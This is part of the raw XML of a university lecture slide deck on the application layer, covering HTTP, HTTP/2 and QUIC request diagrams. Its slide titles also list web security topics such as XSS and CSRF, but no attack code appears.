            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>QUIC Socket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA445BD-D6AF-88F8-2B0F-F322482DF043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="3135791"/>
            <a:ext cx="8409600" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409600" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Arrow Connector 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C74A1CC-ECC5-CE17-9B04-8FEAAB107232}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409600" cy="3810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BB84ED2-E9C9-22DD-1715-379F2E10E012}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3416576"/>
              <a:ext cx="2364493" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /foo.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7151AED4-B92A-2459-AB46-4C97E87DCB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="3643262"/>
            <a:ext cx="8409603" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409603" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D1059D9-5715-153A-B0A8-54473458E8CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409603" cy="38101"/>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5333E3C-4B14-97B4-A6D9-57D62D1361B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3416576"/>
              <a:ext cx="2366738" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /bar.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43FB9967-BB11-6B3A-13F2-CFC017D61C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1749600" y="4137667"/>
            <a:ext cx="8409603" cy="424410"/>
            <a:chOff x="2132743" y="3416576"/>
            <a:chExt cx="8409603" cy="424410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Arrow Connector 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E8D1F2-4E04-61EF-B443-3AAAF87DD604}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132743" y="3802885"/>
              <a:ext cx="8409603" cy="38101"/>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0074820-E90E-6D49-5133-2529C4AD7669}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5164425" y="3416576"/>
              <a:ext cx="2414444" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADER GET /baz.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030CCA9A-05EC-F426-C2F5-FB147CA52862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5244088"/>
            <a:ext cx="8294400"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4972FDA-C0B1-E612-7826-CD6DFA678F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5554888"/>
            <a:ext cx="8294400"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ADD493D-701C-D6ED-3814-AB33A399D107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1749600" y="5894488"/>
            <a:ext cx="8294400"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2FAA64E-4A06-6126-DC84-4B897BA1CE78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354400" y="4902088"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7A63FE-6703-15DD-95A1-07CF52AADBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454010" y="4902088"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D01204-9A53-45D3-8442-AF233DB5A79A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553620" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E81667A6-844C-2BD9-66D3-6EA09BC57D86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5362623" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65F50AB-4374-B9CB-A983-B89EAA48B3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6171626" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAF7065-FE04-DD79-AFCC-1057E5B86E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6980629" y="4897076"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{025D5937-8EE9-5F61-1E4D-E3F252C75F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8080239" y="4895376"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F270724-D829-57C9-839E-6F0A469EA54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889244" y="4895376"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1089298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56CCD-0061-D5B9-CC35-25B87DC718A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUIC is Complicated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89DAC2E0-9F2D-0D1F-3CEC-925E0F7A414F}"/>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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A2F5A2-EBE2-3938-1B25-86E9D59CC19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUIC is an enormously complicated protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fast open and fast cryptographic negotiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BBR-style congestion control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Per stream prioritization and flow control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure connections that are independent of IP address and port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables client mobility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some day, 4700 will devote a whole lecture to studying QUIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18755055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lnDef>
      <a:spPr>
        <a:ln w="5715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91551</TotalTime>
  <Words>6632</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1159</Paragraphs>
  <Slides>95</Slides>
  <Notes>4</Notes>
  <HiddenSlides>5</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95</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="108" baseType="lpstr">
      <vt:lpstr>Aptos Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Source Code Pro Semibold</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Median</vt:lpstr>
      <vt:lpstr>CS 4700 Network Fundamentals</vt:lpstr>
      <vt:lpstr>Application Layer</vt:lpstr>
      <vt:lpstr>Applications on Today’s Internet</vt:lpstr>
      <vt:lpstr>The Hourglass</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol (HTTP)</vt:lpstr>
      <vt:lpstr>Origins</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>HTTP 0.9/1.0</vt:lpstr>
      <vt:lpstr>HTTP Request Format</vt:lpstr>
      <vt:lpstr>HTTP GET Request Example</vt:lpstr>
      <vt:lpstr>HTTP POST Request Example</vt:lpstr>
      <vt:lpstr>HTTP Request Methods</vt:lpstr>
      <vt:lpstr>HTTP Response Example</vt:lpstr>
      <vt:lpstr>HTTP Response Status Codes</vt:lpstr>
      <vt:lpstr>HTTP 0.9/1.0 Socket Semantics</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol (HTTP)</vt:lpstr>
      <vt:lpstr>HTTP 0.9/1.0 versus 1.1</vt:lpstr>
      <vt:lpstr>Ambiguity in HTTP 0.9/1.0</vt:lpstr>
      <vt:lpstr>HTTP 1.1 Host Header</vt:lpstr>
      <vt:lpstr>Performance Problems with HTTP 0.9/1.0</vt:lpstr>
      <vt:lpstr>Web Pages</vt:lpstr>
      <vt:lpstr>HTTP 1.1 Connection Header</vt:lpstr>
      <vt:lpstr>HTTP 1.1 Socket Semantics</vt:lpstr>
      <vt:lpstr>HTTP Caching</vt:lpstr>
      <vt:lpstr>Example Cache Check</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol (HTTP)</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie Example</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol (HTTP)</vt:lpstr>
      <vt:lpstr>The OSI ISO Network Model</vt:lpstr>
      <vt:lpstr>The OSI ISO Network Model</vt:lpstr>
      <vt:lpstr>Sending Data Over HTTP</vt:lpstr>
      <vt:lpstr>Long Live HTTP</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2016+</vt:lpstr>
      <vt:lpstr>Securing the Browser</vt:lpstr>
      <vt:lpstr>Example: Cookies</vt:lpstr>
      <vt:lpstr>Example: Mixing Origins</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Ex: SOP for http://www.example.com/dir/test.html</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (XHR)</vt:lpstr>
      <vt:lpstr>XHR Example</vt:lpstr>
      <vt:lpstr>XHR vs. SOP</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Focus on the Client</vt:lpstr>
      <vt:lpstr>Web Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Cookie Exfiltration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>Mitigating XSS Attacks</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Vulnerable Website</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>Mitigating CSRF Attacks</vt:lpstr>
      <vt:lpstr>HTTP “Referer” Header</vt:lpstr>
      <vt:lpstr>Referer Privacy</vt:lpstr>
      <vt:lpstr>CSRF Tokens</vt:lpstr>
      <vt:lpstr>CSRF Wrapup</vt:lpstr>
      <vt:lpstr>Evolution of HTTP</vt:lpstr>
      <vt:lpstr>HTTP Over Time</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Head-of-line Blocking Example</vt:lpstr>
      <vt:lpstr>Server Push Example</vt:lpstr>
      <vt:lpstr>Goals of HTTP 2</vt:lpstr>
      <vt:lpstr>Protocol Semantics</vt:lpstr>
      <vt:lpstr>HTTP Connection Establishment</vt:lpstr>
      <vt:lpstr>HTTPS Connection Establishment</vt:lpstr>
      <vt:lpstr>HTTP 2 Request Framing</vt:lpstr>
      <vt:lpstr>Parallel Requests</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wire Format</vt:lpstr>
      <vt:lpstr>Lots More to HTTP 2</vt:lpstr>
      <vt:lpstr>Evolution of HTTP</vt:lpstr>
      <vt:lpstr>HTTP Over Time</vt:lpstr>
      <vt:lpstr>Problems With HTTP 2</vt:lpstr>
      <vt:lpstr>Rebuilding HTTP from Layer 4 up</vt:lpstr>
      <vt:lpstr>Layer Diagrams</vt:lpstr>
      <vt:lpstr>Streams in QUIC</vt:lpstr>
      <vt:lpstr>QUIC is Complicated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 Wilson</dc:creator>
  <cp:lastModifiedBy>Christo Wilson</cp:lastModifiedBy>
  <cp:revision>1060</cp:revision>
  <cp:lastPrinted>2012-08-22T04:00:45Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-01-03T02:22:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-05T14:14:50Z</dcterms:modified>
</cp:coreProperties>
</file>